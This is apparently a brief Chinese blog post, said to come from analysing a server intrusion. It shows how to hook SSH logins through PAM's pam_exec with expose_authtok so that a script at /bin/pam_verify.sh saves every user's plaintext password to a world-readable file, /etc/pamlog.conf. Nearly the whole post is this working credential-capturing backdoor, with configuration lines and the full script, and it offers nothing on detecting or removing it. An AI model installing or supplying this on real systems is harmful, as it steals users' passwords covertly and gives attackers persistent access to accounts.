通过pam来记录用户输入密码

一次服务器被入侵分析学到

1.修改/etc/pam.d/sshd,添加
#voidrkflag
auth [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh
password [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh
添加可执行脚本/bin/pam_verify.sh
#!/usr/bin/env bash

# put next line in /etc/pam.d/sshd, then put this script as /bin/pam_verify.sh
# clear authorized_keys, then login via ssh, password will be recorded

# auth [default=ignore] pam_exec.so expose_authtok /bin/pam_verify.sh

recordfile=/etc/pamlog.conf

if [ ! -f $recordfile ];then
    touch $recordfile
    chmod 644 $recordfile
fi

# The password comes in through stdin
PAM_PASSWORD=`cat -`

echo "Service: ${PAM_SERVICE}; User: ${PAM_USER}; Password: ${PAM_PASSWORD}; Type: ${PAM_TYPE}" >> $recordfile
u=3248989123,1632674771&fm=26&gp=0.jpg

你可能感兴趣的:(通过pam来记录用户输入密码)